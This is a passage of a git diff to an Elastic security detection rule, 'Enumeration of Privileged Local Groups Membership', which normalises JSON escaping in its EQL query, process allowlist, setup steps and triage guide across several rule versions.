\"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"*admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", "related_integrations": [ { @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", - "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_107.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_107.json index c06272b7a3f..6cd6eeaf23c 100644 --- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Privileged Local Groups Membership", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "iam where event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"*admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", - "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_108.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_108.json index 8791a4723f5..92bdd541251 100644 --- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_108.json +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_108.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Privileged Local Groups Membership", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "iam where event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"*admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", - "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate 